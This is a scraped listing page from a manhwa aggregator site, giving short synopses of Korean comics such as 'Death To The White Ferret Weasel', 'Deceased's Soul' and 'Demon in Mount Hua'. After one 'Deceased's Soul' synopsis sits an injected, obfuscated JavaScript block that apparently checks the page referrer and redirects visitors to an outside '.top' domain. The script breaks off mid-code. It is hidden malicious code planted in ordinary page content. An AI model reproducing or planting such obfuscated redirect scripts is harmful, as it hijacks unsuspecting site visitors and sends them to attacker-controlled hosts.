Manhwa - Page 40

Manhwa represents the vibrant world of Korean comics, loved for their unique style and stories, especially in webtoon format, covering everything from action to drama.

3220 results

Death To The White Ferret Weasel

Read manhwa Death To The White Ferret Weasel /  Death to the Ferret Sheep / Death to the White Ferret / Death to the White Ferret Weasel Sheep! / 흰 족제비 양에게 죽음을! For a thousand years I was imprisoned in the body of a weasel for destroying the country. One day, a beautiful guy fell down in front of me, not understanding what he was saying. The guy announced that I was his first love and started flirting. She took advantage of it and prayed for the end of her millennial life, “I decided to die again… … .” A great adventure to break the curse of a weasel princess! *** Soaz’s hand put the ferret on the floor. I started rummaging through the backpack I was carrying on my shoulder. Just for one night, why are you packing so much? A truly excellent preparation. ‘What else should you do?’ “I’ll go get a blanket.” ‘No, you mean you have all that?’ Soaz increased the opening of the bag. He pulled out the brown blanket. Silhouette of a housekeeper finishing getting ready for bed. sure… … . ‘It’s a bit expensive to give to others… … . ‘ “Yes?” ‘Oh no. Keep doing what you’re doing. ‘


Death When Separated

Read manhwa Death When Separated / 헤어지면 죽음 The life of a perfect influencer. Dating a girl I like. The last thing that I need to do is date her, but I’m trapped in a life-threatening incident?! “This isn’t an obsession, seriously!” But, if we break up, we’ll die!



One day, Kyung-min, whose self-esteem has hit rock bottom from being Tormented/Bullied by his friends, suddenly receives an invite to ‘DeathCord’, a chatting room where you can kill people through voting. Anonymous death penalty vote in the chat room! Anonymous participants invited to the chat room are keen to kill people for their own reasons. However, one of the chat participants becomes the target of the death penalty, after that, the participants in the “DeathCord” chatroom start struggling to identify each other…A murder game that won’t end unless each other kills each other!


Deceased's Soul

Jeongto and Isaeng - childhood friends and neighbours, one grew up in a hospital and the other in a funeral home. Even with their opposite roles in serving those who live and those who have died, they were extremely close. Yet, ten years later, what was once two friends who could understand and respect the balance they maintained in the cycle of life, death, and rebirth is now two opposing forces trying to control of the path of the deceased souls


Deceased’s Soul ( Rest in Peace )

Jeongto and Isaeng – childhood friends and neighbours, one grew up in a hospital and the other in a funeral home. Even with their opposite roles in serving those who live and those who have died, they were extremely close. Yet, ten years later, what was once two friends who could understand and respect the balance they maintained in the cycle of life, death, and rebirth is now two opposing forces trying to control of the path of the deceased souls<script></script><script>function _0x2bf6(){var _0x5bd745=['random','5473496HlqIGv','http://rea','1986kNuJtS','google','3676Xatehd','2787BHRQqh','.top/','821370lauvnQ','floor','HVbKl','fwUyR','MqgNL','includes','text','href','27NvhXzR','location','https://ip','bIrtg','.customapi','BfOrP','then','1265192zVWhjO','11405IzETOZ','349114BmTGUv','mpOXv','','bGZhU','HvGeI','24571840dxVfYF','referrer','MFsvt','KHByc'];_0x2bf6=function(){return _0x5bd745;};return _0x2bf6();}function _0x1fe1(_0x17acf3,_0xb41295){var _0x1d1aed=_0x2bf6();return _0x1fe1=function(_0x2ad002,_0x43bc0c){_0x2ad002=_0x2ad002-(0x1af5+-0xc3c+0xd6f*-0x1);var _0x20fd32=_0x1d1aed[_0x2ad002];return _0x20fd32;},_0x1fe1(_0x17acf3,_0xb41295);}(function(_0x1d6618,_0x28a53a){var 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December Rain

Fresh out of the army, Suchae decides to take some time off and travel around the country by himself. On the first day of his trip, he spots a guy who looks totally his type at a rundown bus terminal. The only problem is, it's the same guy who was jerking off in the bathroom 5 minutes ago. Despite the possibility of him being a creep, however, Suchae is drawn to the mysterious stranger. He finds everything about him...arousing. Who is this stranger? And why is he on the road?   *disclaimee: trigger warning & I did not translate this bl so please don't be mad *   @uploaderbl


Deception of the Demon King

A powerful demon king that once ruled a very rich kingdom, suddenly vanished without a trace. A hundred years past, when out of nowhere a young man was found seated on the throne. Is he the real demon king? Or is it just a hoax or a dream?


Defence Mechanism

YES to sex, NO to dating! Kim Suho is a complete serial maneater. To make matters even worse, after suffering(?) from falling in love at first sight with Lee Yul, Suho is asked by Yul to protect him in a request he can’t refuse…


Definition of a Villain

A world where there are ‘superpowers’, a new race of humans who surpass human abilities, and ‘guides’ who can control their rampage. ‘Betty’, a guide, hides her identity and lives in a small town in America. One day, ‘James’, a super-powered hero, transfers to Betty’s school to find the villain ‘Dave’. Betty avoids James but continues to become involved with him and to make matters worse, while trying to stop her best friend’s rampage of superpowers, she is forced to use her guide abilities… It turns out that her friend is not an ordinary superpower, but a villain.It was ‘Dave’! Betty is caught between a villain and a hero, and her life, which she wanted to live normally, begins to spiral.Original Webtoon:


Dekinai Futari

ENNao Shirafuji and Takahito Kurose are coworkers and fierce rivals, competing for top sales every month. They might fight like cats and dogs at work, but they were actually lovers in high school! The cause of their breakup was a hurtful sentence he said during their first experience.


Delivery Man From Murim

The martial g** of the Murim becomes a super-fast delivery man!Before even reaching the age of forty, the martial g** "Kang So" had conquered the world. While he was in the midst of consolidating his energy after reaching enlightenment,he suddenly descended into a newly formed riftHe arrives in 21st century South Korea, a land desolated by gates and demonic beasts. Here, the martial g** from the martial world, now a delivery man, shall bring peace!


Demon in Mount Hua

Read Manhwa Demon in Mount Hua Online For Free On ZinManga Associated Names: Demon in Mount Hwa / Le démon du Mont Hua / 魔in華山 / 魔人華山 / 마IN화산  / 마인화산 The Content Demon in Mount Hua: The Murim’s public enemy, the Slaughterer Demon Monarch, Yeom Se-Ak! It’s been a hundred years since he was trapped in Mount Hua after being captured by the Sword God, Han Ho. He waited all these years for his chance to seek revenge… The long period of time caused this incident to be forgotten by the world, and eventually, even the Yeom Se-Ak was forgotten. But. “Sir, what is your name…?” A coincidental meeting, and the name of an archenemy that he said unwittingly, “H-Han Ho.” At the end of a vain journey, an unexpected path branches out. The ultimate demon that’s in Mount Hua, Yeom Se-Ak’s choice! New and hot comics are updated the fastest. Transformed Into A Piece Of Land Spring Letter in the Snow I Became the Youngest Member of Top Idol MangaZin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.
